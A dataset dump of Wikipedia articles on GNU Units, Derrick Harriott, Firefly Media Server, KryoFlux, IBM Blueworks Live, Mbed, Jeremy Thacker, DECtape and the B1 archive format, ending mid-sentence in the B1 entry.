id
stringlengths
3
8
url
stringlengths
32
207
title
stringlengths
1
114
text
stringlengths
93
492k
173360
https://en.wikipedia.org/wiki/GNU%20Units
GNU Units
GNU Units is a cross-platform computer program for conversion of units of quantities. It has a database of measurement units, including esoteric and historical units. This for instance allows conversion of velocities specified in furlongs per fortnight, and pressures specified in tons per acre. Output units are checked for consistency with the input, allowing verification of conversion of complex expressions. History GNU Units was written by Adrian Mariano as an implementation of the units utility included with the Unix operating system. It was originally available under a permissive license. The GNU variant is distributed under the GPL although the FreeBSD project maintains a free fork of units from before the license change. units (Unix utility) The original units program has been a standard part of Unix since the early Bell Laboratories versions. Source code for a version very similar to the original is available from the Heirloom Project. The GNU implementation GNU units includes several extensions to the original version, including Exponents can be written with ^ or **. Exponents can be larger than 9 if written with ^ or **. Rational and decimal exponents are supported. Sums of units (e.g., ) can be converted. Conversions can be made to sums of units, termed unit lists (e.g., from degrees to degrees, minutes, and seconds). Units that measure reciprocal dimensions can be converted (e.g., S to megohm). Parentheses for grouping are supported. This sometimes allows more natural expressions, such as in the example given in Complex units expressions. Roots of units (e.g., can be computed. Nonlinear units conversions (e.g., °F to °C) are supported. Functions such as sin, cos, ln, log, and log2 are included. A script for updating the currency conversions is included; the script requires Python. Units definitions, including nonlinear conversions and unit lists, are user extensible. The plain text database definitions.units is a good reference in itself, as it is extensively commented and cites numerous sources. Other implementations UDUNITS is a similar utility program, except that it has an additional programming library interface and date conversion abilities. UDUNITS is considered the de facto program and library for variable unit conversion for netCDF files. Version history GNU Units version 2.19 was released on 31 May 2019, to reflect the new 2019 revision of the SI; Version 2.14 released on 8 March 2017 fixed several minor bugs and improved support for building on Windows. Version 2.10, released on 26 March 2014, added support for rational exponents greater than one, and added the ability to save an interactive session in a file to provide a record of the conversions performed. Beginning with version 2.10, a 32-bit Windows binary distribution has been available on the project Web page (a 32-bit Windows port of version 1.87 has been available since 2008 as part of the GnuWin32 project). Version 2.02, released on 11 July 2013, added hexadecimal floating-point output and two other options to simplify changing the output format. Version 2.0, released on 2 July 2012, added the ability to convert to sums of units, such as hours and minutes or feet and inches. In addition, this release added support for UTF-8 encoding. Provision for locale-specific unit definitions was added. The syntax for defining non-linear units was changed, and added optional domain and range specifications. The names of the standard and personal units data files were changed, and the currency definitions were placed in a separate data file; a Python script for updating the currency definitions was added. The version history is covered in detail in the NEWS file included with the source distribution. Usage Units will output the result of the conversion in two lines. Usually, the first line (multiplication) is the desired result; the second line is the same conversion expressed as a division. Units can also function as a general-purpose scientific calculator; it includes several built-in mathematical functions such as sin, cos, atan, ln, exp, etc. Attempting to convert types of measurements that are incompatible will cause units to print a conformability error message and display a reduced form of each measurement. Examples The examples that follow show results from GNU units version 2.10. Interactive mode Currency exchange rates from www.timegenie.com on 2014-03-28 2729 units, 92 prefixes, 77 nonlinear units You have: 10 furlongs You want: miles * 1.25 / 0.8 You have: 1 gallon + 3 pints You want: quarts * 5.5 / 0.18181818 You have: sqrt(meter) ^ Unit not a root You have: sqrt(acre) You want: ft * 208.71033 / 0.0047913298 You have: 21 btu + 6500 ft lbf You want: btu * 29.352939 / 0.034068139 You have: _ You want: J * 30968.99 / 3.2290366e-005 You have: 3.277 hr You want: time 3 hr + 16 min + 37.2 sec You have: 1|2 inch You want: cm * 1.27 / 0.78740157 The underscore ('_') is used to indicate the result of the last successful unit conversion. On the command line (non-interactive) C:\>units "ten furlongs per fortnight" "kilometers per hour" * 0.0059871429 / 167.02458 % units cup ounces conformability error 0.00023658824 m^3 0.028349523 kg Complex units expressions One form of the Darcy–Weisbach equation for fluid flow is where ΔP is the pressure drop, ρ is the mass density, f is the (dimensionless) friction factor, L is the length of the pipe, Q is the volumetric flow rate, and d is the pipe diameter. It might be desirable to have the equation in the form that would accept typical US units; the constant A1 could be determined manually using the unit-factor method, but it could be determined more quickly and easily using units: $ units "(8/pi^2)(lbm/ft^3)ft(ft^3/s)^2(1/in^5)" psi * 43.533969 / 0.022970568 Crane Technical Paper No. 410, Eq. 3-5, gives the multiplicative value as 43.5. Notes References External links Linux man page for units Java version of GNU units GnuWin port of GNU units units source from the Heirloom Project Online units converter based on GNU units A simple online converter based on GNU units Cross-platform software Unix software Units Free mathematics software
4051893
https://en.wikipedia.org/wiki/Derrick%20Harriott
Derrick Harriott
Derrick Clifton Harriott OD (born 6 February 1939) is a Jamaican singer and record producer. He was a member of the Jiving Juniors with Herman Sang before embarking on a solo career. He has produced recordings by Big Youth, Chariot Riders, The Chosen Few, Dennis Brown, The Ethiopians, Keith & Tex, The Kingstonians, Rudy Mills, Scotty, Sly & Revolutionaries, and Winston McAnuff. Biography The Jiving Juniors As a student at Excelsior High School, Harriott formed a duo with Claude Sang Jr. Harriott entered the Vere Johns Opportunity Hour talent contest as a solo artist in 1955, failing to reach the final round, and entered again in 1957 as a duo with Sang, going on to win several times. The duo first recorded for Stanley Motta, and went on to record for several producers, having hits including "Daffodil" and "Birds of Britain" before splitting up when Sang's job took him overseas. In 1958 Harriott formed the Jiving Juniors with Eugene Dwyer, Herman Sang (Claude's younger brother), and Maurice Wynter. The group had success on the Vere Johns Opportunity Hour, and in 1960 and 1961 had hit singles with "Lollipop Girl" (for Duke Reid) and "Over The River" (aka "I'll Be Here When He Comes", for Coxsone Dodd). The group split up after Harriott emigrated to the United States, although the other members continued for a while with Jimmy Mudahy replacing Harriott. After struggling to find work, Harriott reformed the Jiving Juniors with a new line-up, having already teamed up again with Claude Sang in New York. The new line-up included Winston Service and Valmont Burke, and split their time between Jamaica and New York, where they recorded at the Mirasound Studios, having hits including "Sugar Dandy". The travelling took its toll and the group split up in 1962. Solo and production career Harriott embarked on a solo career and later formed his own record label, Crystal. His first solo release, "I Care", was a hit, with further hits following with "What Can I Do" (1964), "The Jerk" (1965) and "I'm Only Human" (1965), all of which were included on his debut album, The Best of Derrick Harriott. In 1967 he had further solo hits with "The Loser" and "Solomon", as well as with productions of other artists, including The Ethiopians' "No Baptism", and Keith And Tex's "Tonight" and "Stop That Train". The lyrics to his song "Message from a Black Man" (circa 1970) echoed the growing black consciousness in American soul music of that time. In 1970 he issued The Crystalites' The Undertaker, an instrumental album in a similar vein to the early music of The Upsetters. He produced successful albums by other artists, including DJ Scotty's Schooldays, Dennis Brown's Super Reggae and Soul Hits, and also his own 14 Chartbuster Hits. In 1971, Swing magazine named Harriott the Top Producer of 1970. He was one of the first producers to use King Tubby mixing talents at his Waterhouse studio, issuing one of the earliest dub albums in 1974: Scrub A Dub, credited to The Crystallites. Harriott followed this with another dub/instrumental album, More Scrubbing The Dub. His late 1970s productions used backing from The Revolutionaries on albums such as Winston McAnuff's Pick Hits To Click (1978), DJ Ray I's Rasta Revival (1978) and his own Enter The Chariot and Disco 6 (a compilation album featuring Dennis Brown, Cornell Campbell and Horace Andy). In the 1970s he opened his first record shop on King Street in Kingston, later moving to larger premises at Twin Gates Plaza in Half-Way Tree. In the 1980s, he continued to have hits with soul cover versions, such as "Skin To Skin" and "Checking Out". In 1988 he scored with "Starting All Over Again", a duet with Yellowman, with lyrics about Hurricane Gilbert. The mid to late 1990s saw solo efforts such as Sings Jamaican Rock Steady Reggae, For a Fistful of Dollars, Derrick Harriott & Giants, and Riding the Roots Chariot being released. In July 2002 in Toronto, Ontario, Canada, Harriott performed at the two-night Legends of Ska festival. Other performers included: Skatalites, Rico Rodriguez, Lester Sterling, Johnny Moore, Lynn Taitt, Prince Buster, Alton Ellis, Lord Creator, Justin Hinds, Derrick Morgan and Lord Tanamo. In 2009, Harriott was awarded the Order of Distinction by the Jamaican government, and in 2019 he received a Lifetime Achievement Award in Music from the Jamaica Reggae Industry Association (JaRIA). Discography Albums The Best of Derrick Harriott – 1965 – Island The Best of Derrick Harriott Volume 2 – 1968 – Trojan Sings Jamaican Reggae – 1969 – Crystal/Pama The Crystalites – Undertaker – 1970 Trojan Psychedelic Train – 1970 – Crystal/Trojan Presents Scrub-A-Dub Reggae – 1974 – Crystal More Scrubbing The Dub – 1975 – Crystal Songs For Midnight Lovers – 1976 – Crystal/Trojan Derrick Harriott & The Revolutionaries – Reggae Chart Busters Seventies Style – 1977 Reggae Disco Rockers – 1977 – Charmers Born to Love You – 1979 – Crystal Compilation albums Derrick Harriott & Various Artists – 14 Chartbuster Hits – 1973 – Crystal Derrick Harriott & The Crystalites / Chariot Riders – 1970 – Blockbuster Reggae Instrumentals Greatest Reggae Hits – 1975 – Crystal/Trojan Disco 6 – 1977 Enter The Chariot – 1978 Derrick Harriott & Various Artists – Those Reggae Oldies – 1978 Derrick Harriott & The Jiving Juniors – The Donkey Years 1961–1965 – Jamaican Gold (1993) Derrick Harriott & Various Artists – Step Softly 1965–1972 – Trojan (1988) Derrick Harriott – Sings Jamaican Rock Steady Reggae – Jamaican Gold Derrick Harriott & The Crystalites – For A Fistful of Dollars – Jamaican Gold From Chariot's Vault Volume 2: 16 Reggae Hits – Jamaican Gold Derrick Harriott & Various Artists – Riding the Roots Chariot – 1998 – Pressure Sounds Derrick Harriott & Various Artists – Skin To Skin – 1989 – Sarge Derrick Harriott & Various Artists – Musical Chariot'' – 1990 – Charly Records See also List of reggae musicians Island Records discography List of Jamaican record producers List of Jamaican backing bands References External links Pressure Sounds biography of Harriott Derrick Harriott & The Jiving Juniors I Derrick Harriott & The Jiving Juniors II 1939 births Jamaican reggae musicians Jamaican male singers Jamaican record producers Living people
5736617
https://en.wikipedia.org/wiki/Firefly%20Media%20Server
Firefly Media Server
Firefly Media Server (formerly mt-daapd) is an open-source audio media server (or daemon) for the Roku SoundBridge and iTunes. It serves media files using Roku Server Protocol (RSP) and Digital Audio Access Protocol (DAAP). Features Its features include: Support for running on Unix/POSIX platforms Support for running on Microsoft Windows and Mac OS X Support for running on the Apple Inc. iPhone and iPod touch Support for MP3, AAC, Ogg, FLAC, and WMA Support for Roku SoundBridge via RSP Support for on-the-fly transcoding of Ogg, FLAC, ALAC, and WMA On Windows platforms, on-the-fly transcoding of WMA Lossless, WMA Pro and WMA Voice. Web-based configuration Support for user-created smart playlists Integration with iTunes library including reading playlists Supports serving streaming radio stations Firefly Media Server was formerly known as mt-daapd. It was renamed when it adopted new features such as support for RSP and support for Microsoft Windows and Mac OS X. Latest developments Firefly Media Server is not under active development, although there have been a few attempts to resurrect it. There has been an abortive effort to continue this project as Firefly2 Media Server without any developers coming forward, however the old forums and links to many forked versions are available at the new website. Since July 2009, development continued on a Linux/FreeBSD fork named forked-daapd. forked-daapd later renamed to OwnTone Server. Client players DAAP (Android audio player) Rhythmbox, Banshee, and Amarok (Linux media players) See also SlimServer External links Firefly Media Server website Twitter Free software programmed in C Streaming software Windows multimedia software MacOS multimedia software Unix Internet software Audio streaming software for Linux
41340805
https://en.wikipedia.org/wiki/KryoFlux
KryoFlux
KryoFlux is a hardware and software solution for preserving software on floppy disks. It was developed by the Software Preservation Society. KryoFlux consists of a small hardware device, which is a software-programmable FDC system that runs on small ARM-based devices that connects to a floppy disk drive and a host PC over USB, and software for accessing the device. KryoFlux reads "flux transitions" from floppy disks at a very fine resolution. It can also read disks originally written with different bit cell widths and drive speeds, with a normal fixed-speed drive. The software is available for Microsoft Windows, Mac OS and Linux. The KryoFlux controller plugs into a standard USB port, and allows normal PC floppy disk drives to be plugged into it. Because the device operates on data bits at the lowest possible level with very precise timing resolution, it allows modern PCs to read, decode and write floppy disks that use practically any data format or method of copy protection to aid in digital preservation. It has been tested successfully with many generations of floppy disk drive including 8", 5.25", 3.5" and 3" mechanisms, and dozens of disk formats including numerous schemes originally designed to prevent software piracy, allowing the preservation (typically to an image file stored on hard disk or other modern media) of programs and data that will inevitably succumb to data degradation as the original physical media deteriorates and becomes unreadable over time. The image files produced may be rewritten to fresh disk media or, more commonly, used with software emulations of the original systems. When reading old disks (especially those stored in non-climate controlled environments for long periods) there are a number of problems that can arise, including weakening of the magnetic field storing the data, deterioration of the binder holding the metal particles to the plastic disk surface, friction issues preventing the disk rotating freely in its outer protective sleeve, and issues caused by physical misalignment of the drive that originally wrote the disk or the one being used to read it. Users have detailed various techniques to aid in the recovery of data stored on such marginal disks. References Archival science Digital preservation Floppy disk computer storage
33736801
https://en.wikipedia.org/wiki/IBM%20Blueworks%20Live
IBM Blueworks Live
IBM Blueworks Live is a business process modeller, belonging under the set of IBM SmartCloud applications. The application is designed to help organizations discover and document their business processes, business decisions and policies in a collaborative manner. It is designed to be simple and intuitive to use, while still having the capabilities to implement more complex models. Blueworks Live adheres to the BPMN 2.0 standard developed and maintained by BPMN.org. Purpose Blueworks Live is intended to be a business-user focused process & decision discovery and documentation tool. There are a number of more complicated BPMN 2.0 specification attributes that are left out in the aim of creating simple, understandable processes & decisions in Blueworks Live. All data is stored in the cloud eliminating the need for infrastructure beyond a computer with a web browser. Blueworks Live is also fully integrated with IBM's BPM product enabling customers to quickly take their processes from discovery to implementation if so desired. History The original concept for business process modeler with a SaaS deployment model came with BluePrint, an application developed by Lombardi Inc. The company with its range of BPM products caught IBM's attention, so in January 2010 they made an acquisition of Lombardi. IBM already had a product in the same space known as IBM Blueworks, but that was superseded by the new technology of Lombardi's Blueprint and became Blueworks Live. IBM launched the Blueworks Live on 20 November 2010. Features Discovery and documentation Capturing processes & decisions Blueworks Live provides various tools for companies to capture business processes & decisions, using a collaborative approach to discovering those processes with maximum accuracy. There are three different views for process data, the Discovery Map, Process Diagram, and Documentation. The Discovery Map is intended to enable business users to quickly and efficiently get the process activities and milestones out on 'paper'. This view is all about getting the information out there as quickly as possible without worrying about the process logic. When you have sufficiently identified the process in the Discovery Map, use the details popup to provide the Participant data, and then Blueworks Live can generate the Process Diagram where you will add the details of the process logic and flows. Each Participant identified in the Discovery Map will have a swimlane and the activities assigned will be in their swimlane. The Documentation view is intended to read like a Microsoft Word document with all of the process documentation that you have added in the details popup. Decisions only have one view, the Decision Diagram. This is a graphical representation of the decision, the flows, and sub-decisions involved. Each decision and sub-decision has inputs and outputs that can be defined to populate the decision table. Blueworks Live is compliant with the DMN 1.0 specification. Data import and export Blueworks Live allows users to import diagrams from: Microsoft Visio using the vdx XML format BPMN 2.0 XML XPDL 2.1 XML In terms of export, users can automatically generate outputs in following formats: Microsoft PowerPoint Microsoft Word Microsoft Excel Process Data (Export Process option) BPMN 2.0 (Export Process option) (Note: This output format does not contain the diagrams or diagram elements) XPDL 2.1 (Export Process option) IBM WebSphere Business Modeler XML 7.0 (Export Process option) Centralized collaboration Blueworks Live uses many social networking features, enabling team collaboration: Instant messaging Live news feeds Commenting (process changes) Newsfeed - current work statistics and reports on the site's main page Public and private communities Blueworks Live use its main page to inform users about all the changes occurring to company processes, where the user is involved (private), or about information regarding useful and news about wider BPM communities. This involves blogs, tutorials or application changes and updates. Licensing Blueworks Live distinguishes between four types of license: Editors, Contributors, Viewers, and Community. Editors are able to: Create and modify processes & decisions Publish processes & decisions Automate processes Manage spaces Utilize the Analyze and Playback features Contributors are able to: Add Comments to processes & decisions Participate in process automation Viewers are able to: View published processes and decisions Viewers can follow the link to open published process in Blueworks Live. Viewers can review process & decision details: Discovery map, Process diagram & Process documentation The viewer capabilities are to enable a wider adoption across an enterprise. In cases where a customer utilizes SSO for login, and has viewer licenses, the account administrator can enable JIT provisioning. Community users can: View the Community tab Perform the role of account Admin Automating simple processes Blueworks Live provides its users also with automate process feature. There are two different types of process allowed in Blueworks Live, workflow and checklist. The workflow process application will allow you to create either parallel or sequential activities. This is useful for review and approval types of processes. This process type will distribute the tasks in a very precise manner determined by the design of the workflow you create. The checklist process application is useful when you want to disseminate information all at once, without caring in what order people respond. Privacy and security Data privacy and security All the information and data stored in Blueworks live is private, and inaccessible by IBM unless specifically given written permission for access by a customer. Network security Servers are protected by firewall configured to block all traffic on ports other than 80 or 443 (HTTP, HTTPS). Blueworks live also uses 256-bit Secure Sockets Layer (SSL 3.0 / TLS 1.2) for server authentication and data encryption. User authentication is ensured by providing every user a unique password tied with his personal or company e-mail address. Authentication IBM lets the users choose their own preferred level of authentication in application settings. There are two security levels: Medium and High. Medium: The password is required when changing it to new one, user is locked out, if he fails to log in several times in a row. High: Password policy, maximizing password strength, requires user to change it every 90 days. Compatibility Since Blueworks Live is a web application, it can be accessed from any workstation with Internet connectivity and a web browser, regardless of the operating system. Some of the basic features are also accessible through a mobile phone. Browsers currently supported include Internet Explorer, Firefox, Safari and Google Chrome. Sources List of Blueworks Live features, Official Blueworks Live site - https://www.ibm.com/products/blueworkslive IBM launches Blueworks Live, business process fixes as a service, Larry Dignan, October 11, 2010, ZDNET.com - http://www.zdnet.com/blog/btl/ibm-launches-blueworks-live-business-process-fixes-as-a-service/40286 Blueworks Live article, BPM geek Initiative website - http://bpmgeek.com/blueworks-live Automate manual processes with IBM Blueworks Live, Belinda Chang, Staff Software Engineer, IBM developer works - http://www.ibm.com/developerworks/websphere/bpmjournal/1106_chang/1106_chang.html?ca=drs- IBM Blueworks Live sneak-peak [sic], Column 2 BPM blog - http://www.column2.com/2010/11/ibm-blueworks-live-sneak-peak/ Blueworks Live Update, April 4, 2011 by Scott Francis, BP3 BPM blog - http://www.bp-3.com/blogs/2011/04/blueworks-live-update-april-2011/ IBM Announces Blueworks Live, 'Lite' SaaS Based BPM, by David Roe, CMS Wire - http://www.cmswire.com/cms/enterprise-cms/ibm-announces-blueworks-live-lite-saas-based-bpm-008844.php Blueworks Live: A Curate’s Egg, Mike Gammage, November 11, 2010, posted in "Cloud", Business Computing World - http://www.businesscomputingworld.co.uk/blueworks-live-a-curates-egg/ References External links Official website Free trial Workflow applications Blueworks Live Cloud infrastructure
34578512
https://en.wikipedia.org/wiki/Mbed
Mbed
Mbed is a platform and operating system for internet-connected devices based on 32-bit ARM Cortex-M microcontrollers. Such devices are also known as Internet of Things devices. The project is collaboratively developed by Arm and its technology partners. Software development Applications Applications for the Mbed platform can be developed using the Mbed online IDE, a free online code editor and compiler. Only a web browser needs to be installed on the local PC, since a project is compiled on the cloud, i.e. on a remote server, using the ARMCC C/C++ compiler. The Mbed IDE provides private workspaces with ability to import, export, and share code with distributed Mercurial version control, and it can be used also for code documentation generation. Applications can be developed also with other development environments such as Keil µVision, IAR Embedded Workbench, and Eclipse with GCC ARM Embedded tools. Mbed OS Mbed OS provides the Mbed C/C++ software platform and tools for creating microcontroller firmware that runs on IoT devices. It consists of the core libraries that provide the microcontroller peripheral drivers, networking, RTOS and runtime environment, build tools and test and debug scripts. These connections can be secured by compatible SSL/TLS libraries such as Mbed TLS or wolfSSL, which supports mbed-rtos. A components database provides driver libraries for components and services that can be connected to the microcontrollers to build a final product. Mbed OS, the RTOS, is based on Keil RTX5. Hardware development Demo-boards There are various hardware demo-boards for the Mbed platform, with the first being the original Mbed Microcontroller board. The Mbed Microcontroller Board (marketed as the "mbed NXP LPC1768") is a demo-board based on an NXP microcontroller, which has an ARM Cortex M3 core, running at 96 MHz, with 512 KB flash, 32 KB RAM, as well as several interfaces including Ethernet, USB Device, CAN, SPI, I2C and other I/O. The Mbed microcontroller received first prize in the annual EDN Innovation Awards' Software/Embedded Tools category in 2010. Various versions of the board were released, with NXP LPC2368 (ARM7TDMI-S), NXP LPC1768 (Cortex-M3), NXP LPC11U24 (Cortex-M0) microcontrollers. HDK The Mbed hardware development kit (HDK) is designed for OEMs, and provides information to build custom hardware to support Mbed OS. This consists of interface firmware and schematics that can be used to easily create development boards, OEM modules and re-programmable products suitable for production. Project development The project is developed by Arm in conjunction with other major technology companies and the Mbed developer community. Development and contributions happen at different levels: Core Platform – The core software platform, developed by core contributors and partner companies and managed and maintained by the Mbed team. This core platform is developed under the Apache License 2.0 via a contributor agreement. This includes all the core generic software components the platform provides, plus the HAL ports that allow Mbed to transparently run on different manufacturers microcontrollers and the toolchain ports that allow development using different embedded toolchains. Component Database – Library components, developed by companies and the wider community, to provide support for peripheral components, sensors, radios, protocols and cloud service apis needed to build end devices. These are contributed under the Apache License 2.0 (encouraged) or other licenses chosen by the creators, and supported by those individual companies and members of the developer community References External links ARM operating systems Microcontroller software
25499624
https://en.wikipedia.org/wiki/Jeremy%20Thacker
Jeremy Thacker
Jeremy Thacker was an 18th-century writer and watchmaker (although see the important qualification under 'Hoax?' below), who for a long time was believed to be the first to have coined the word "chronometer" for precise clocks designed to find longitude at sea, though an earlier reference by William Derham has now been found. Thacker is credited with writing The Longitudes Examin'd, published in London in 1714, in which the term 'chronometer' appears. In the work, the claim is made that Thacker created and extensively tested a marine chronometer positioned on gimbals and within a vacuum, and that sea trials would take place. It has been concluded by others that such tests must have resulted in failure. The idea of a vacuum for a marine clock had already been proposed by the Italian clockmaker Antimo Tempera in 1668. Slightly later, John Harrison would successfully build marine timekeepers from 1730. Hoax? According to an article published in the Times Literary Supplement in November 2008, Pat Rogers argued that "Thacker may never have existed and his proposal now emerges possibly as a hoax?". Rogers argues Thacker was an invention of John Arbuthnot, and that The Longitudes Examined fell within the major tradition for satire, and that it was designed to send-up ambitious longitude projects. This view met with opposition from Jonathan Betts and Andrew King, both noted Harrisonians, who argued that, as Rogers acknowledged, there were in fact "convincing reasons for accepting the traditional view that some good science is dropped into the project". Further reading Gregory Lynall, 'Scriblerian Projections of Longitude: Arbuthnot, Swift, and the Agency of Satire in a Culture of Invention', Journal of Literature and Science, vol. 7, no. 2 (2014), ISSN 1754-646X, pp. 1–18. Notes English clockmakers 18th-century English writers 18th-century English male writers 18th-century British people
893415
https://en.wikipedia.org/wiki/DECtape
DECtape
DECtape, originally called Microtape, is a magnetic tape data storage medium used with many Digital Equipment Corporation computers, including the PDP-6, PDP-8, LINC-8, PDP-9, PDP-10, PDP-11, PDP-12, and the PDP-15. On DEC's 32-bit systems, VAX/VMS support for it was implemented but did not become an official part of the product lineup. DECtapes are 3/4 inch (19 mm) wide, and formatted into blocks of data that can each be read or written individually. Each tape stores 184K 12-bit PDP-8 words or 144K 18-bit words. Block size is 128 12-bit words (for the 12-bit machines), or 256 18-bit words for the other machines (16, 18, 32, or 36 bit systems). From a programming point of view, because the system is block-oriented and allows random seeking, DECtape behaves like a very slow disk drive. Origins DECtape has its origin in the LINCtape tape system, which was originally designed by Wesley Clark at the MIT Lincoln Laboratory as an integral part of the LINC computer. There are simple LINC instructions for reading and writing tape blocks using a single machine instruction. The design of the LINC, including LINCtape, was placed in the public domain because its development had been funded by the government. LINCtape drives were manufactured by several companies, including Digital. In turn, LINCtape's origin can be found in the magnetic tape system for the historic Lincoln Laboratory TX-2 computer, designed by Richard L. Best and T. C. Stockebrand. The TX-2 Tape System is the direct ancestor of LINCtape, including the use of two redundant sets of five tracks and a direct drive tape transport, but it uses a physically incompatible tape format (½-inch tape on 10-inch reels, where LINC tape and DECtape used ¾-inch tape on 4-inch reels). Digital initially introduced the Type 550 Microtape Control and Type 555 Dual Microtape Transport as peripherals for the PDP-1 and PDP-4 computers, both 18-bit machines. DEC advertised the availability of these peripherals in March and May, 1963, and by November, planning was already underway to offer the product for the 12-bit PDP-5 and 36-bit PDP-6, even though this involved a change in recording format. The initial specifications for the Type 550 controller discuss a significant advance beyond the LINCtape, the ability to read and write in either direction. By late 1964, the Type 555 transport was being marketed as a DECtape transport. The tape transport used on the LINC is essentially the same as the Type 555 transport, with the same interface signals and the same physical tape medium. The LINC and DEC controllers, however, are incompatible, and the positions of the supply and take-up reels were reversed between the LINC and DEC tape formats. While LINCtape supports high-speed bidirectional block search, it only supports actual data read and write operations in the forward direction. DECtape uses a significantly different mark track format to provide for the possibility of read and write operations in either direction, although not all DECtape controllers support reverse read. DEC applied for a patent on the enhanced features incorporated into DECtape in late 1964. It is notable that the inventor listed on this patent, Thomas Stockebrand, is also an author of the paper on the TX-2 tape system from which the LINC tape was derived. Eventually, the TC12-F tape controller on the PDP-12 supported both LINCtape and DECtape on the same transport. As with the earlier LINC-8, the PDP-12 is a PDP-8 augmented with hardware support for the LINC instruction set and associated laboratory peripherals. Technical details DECtape was designed to be reliable and durable enough to be used as the main storage medium for a computer's operating system (OS). It is possible, although slow, to use a DECtape drive to run a small OS such as OS/8 or OS/12. The system would be configured to put temporary swap files on a second DECtape drive, so as to not slow down access to the main drive holding the system programs. Upon its introduction, DECtape was considered a major improvement over hand-loaded paper tapes, which could not be used to support swap files essential for practical timesharing. Early hard disk and drum drives were very expensive, limited in capacity, and notoriously unreliable, so the DECtape was a breakthrough in supporting the first timesharing systems on DEC computers. The legendary PDP-1 at MIT, where early computer hacker culture developed, adopted multiple DECtape drives to support a primitive software sharing community. The hard disk system (when it was working) was considered a "temporary" file storage device used for speed, not to be trusted to hold files for long-term storage. Computer users would keep their own personal work files on DECtapes, as well as software to be shared with others. The design of DECtape and its controllers is quite different from any other type of tape drive or controller at the time. The tape is wide, accommodating 6 data tracks, 2 mark tracks, and 2 clock tracks, with data recorded at roughly 350 bits per inch (138 bits per cm). Each track is paired with a non-adjacent track for redundancy by wiring the tape heads in parallel; as a result the electronics only deal with 5 tracks: a clock track, a mark track and 3 data tracks. Manchester encoding (PE) was used. The clock and mark tracks are written only once, when the tape was formatted; after that, they are read-only. This meant a "drop-out" on one channel could be tolerated; even a hole punched through the tape with a hole punch will not cause the read to fail. Another reason for DECtape's unusually high reliability is the use of laminated tape: the magnetic oxide is sandwiched between two layers of mylar, rather than being on the surface as was common in other magnetic tape types. This allows the tape to survive many thousands of passes over the tape heads without wearing away the oxide layer, which would otherwise have occurred in heavy swap file use on timesharing systems. The fundamental durability and reliability of DECtape was underscored when the design of the tape reel mounting hubs was changed in the early 1970s. The original machined metal hub with a retaining spring was replaced by a lower cost single-piece plastic hub with 6 flexible arms in a "starfish" or "flower" shape. When a defective batch of these new design hubs was shipped on new DECtape drives, these hubs would loosen over time. As a result, DECtape reels would fall off the drives, usually when being spun at full speed, as in an end-to-end seek. The reel of tape would fall onto the floor and roll in a straight line or circle, often unspooling and tangling the tape as it went. In spite of this horrifying spectacle, desperate users would carefully untangle that tape and wind it laboriously back onto the tape reel, then re-install it onto the hub, with a paper shim to hold the reel more tightly. The data on the mangled DECtape could often be recovered completely and copied to another tape, provided that the original tape had only been creased multiple times, and not stretched or broken. DEC quickly issued an Engineering Change Order (ECO) to replace the defective hubs, to resolve the problem. Eventually, a heavily used or abused DECtape begins to become unreliable. The operating system is usually programmed to keep retrying a failed read operation, which often succeeds after multiple attempts. Experienced DECtape users learned to notice the characteristic "shoe-shining" motion of a failing DECtape as it is passed repeatedly back and forth over the tape heads, and would retire the tape from further use. On non-DEC computers Computer Operations Inc (COI) of Beltsville, Maryland offered a DECtape clone in the 1970s. Initially, COI offered LINC-tape drives for computers made by Data General, Hewlett-Packard and Varian, with only passing reference to its similarity to DECtape. While DECtape and LINC tape are physically interchangeable, the data format COI initially used for 16-bit minicomputers was distinct from both the format used by the LINC and the format used on DECtape. When COI offered the LINC Tape II with support for the DEC PDP-8, PDP-11, Data General Nova, Interdata 7/32, HP 2100, Honeywell 316 and several other computers in 1974, the drive was priced at $1995 and was explicitly advertised as being DECtape compatible. In 1974, DEC charged COI with patent infringement. COI, in turn, filed a suit claiming that DEC's patent was invalid on several grounds, including the assertions that DEC had marketed DECtape-based equipment for over a year before filing for the patent, that they had failed to properly disclose the prior art, and that the key claims in the DEC patent were in the public domain. The US Patent and Trademark Office ruled DEC's patent invalid in 1978. The court case continued into the 1980s. DECtape II DECtape II was introduced around 1978 and has a similar block structure, but uses a much smaller tape (the same width as an audio compact cassette). The tape is packaged in a special, pre-formatted DC150 miniature cartridge consisting of a clear plastic cover mounted on a textured aluminum plate. Cartridge dimensions are . The TU58 DECtape II drive has an RS232 serial interface, allowing it to be used with the ordinary serial ports that are very common on Digital's contemporary processors. Because of its low cost, the TU58 was fitted to several different systems (including the VT103, PDP-11/24 and /44 and the VAX-11/730 and /750) as a DEC-standard device for software product distribution, and for loading diagnostic programs and microcode. The first version of the TU58 imposed very severe timing constraints on the unbuffered UARTs then being used by Digital, but a later firmware revision eased the flow-control problems. The RT11 single-user operating system can be bootstrapped from a TU58, but the relatively slow access time of the tape drive makes use of the system challenging to an impatient user. Like its predecessor DECtape, and like the faster RX01 floppies used on the VAX-11/780, a DECtape II cartridge has a capacity of about 256 kilobytes. Unlike the original DECtape media, DECtape II cartridges cannot be formatted on the tape drive transports sold to end-users, and have to be purchased in a factory pre-formatted state. The TU58 is also used with other computers, such as the Automatix Autovision machine vision system and AI32 robot controller. TU58 driver software is available for modern PCs running DOS. Early production TU58s suffered from some reliability and data interchangeability problems, which were eventually resolved. However, rapid advances in low-cost floppy disk technology, which had an inherent speed advantage, soon outflanked the DECtape II and rendered it obsolete. See also LINC additional material on LINCtape lineage and operation References External links TU56 DECtape Drive Information DECtape Documentation at bitsavers.org VT103 manual at bitsavers.org. Appendix A describes the TU58 interface protocol. DEC hardware History of computing hardware Computer-related introductions in 1963
41630273
https://en.wikipedia.org/wiki/B1%20%28archive%20format%29
B1 (archive format)
B1 is an open archive file format that supports data compression and archiving. B1 files use the file extension ".b1" or ".B1" and the MIME media type application/x-b1. B1 incorporates the LZMA compression algorithm. B1 archive combines a number of files and folders into one or more volumes, optionally adding compression and encryption. Construction of the B1 archive involves creating a binary stream of records and building volumes of that stream. The B1 archive format supports password-based AES-256 encryption. B1 files are created and opened with its native open-source B1 Pack Tool, as well as B1 Free Archiver utility. B1 Pack Project B1 Pack is an open-source software project that produces a cross-platform command-line tool and a Java library for creating and extracting file archives in the B1 archive format. Source code of the project is published at GitHub. B1 Pack Project is released under the Apache License. The B1 Pack Tool module builds a single executable JAR file which can create, list, and extract B1 archive files from a command-line interface. B1 format features Support for Unicode names for files inside an archive. Archives and the files inside it can be of any size. Support for split archives, that consist of several parts. Integrity check with the Adler-32 algorithm. Data compression using the LZMA algorithm. Supports encryption with the AES algorithm. API features Instant creation of an archive without reading from/writing to a file system. Producing only a byte range of an archive, e.g. for resuming downloads. Streaming archive content without 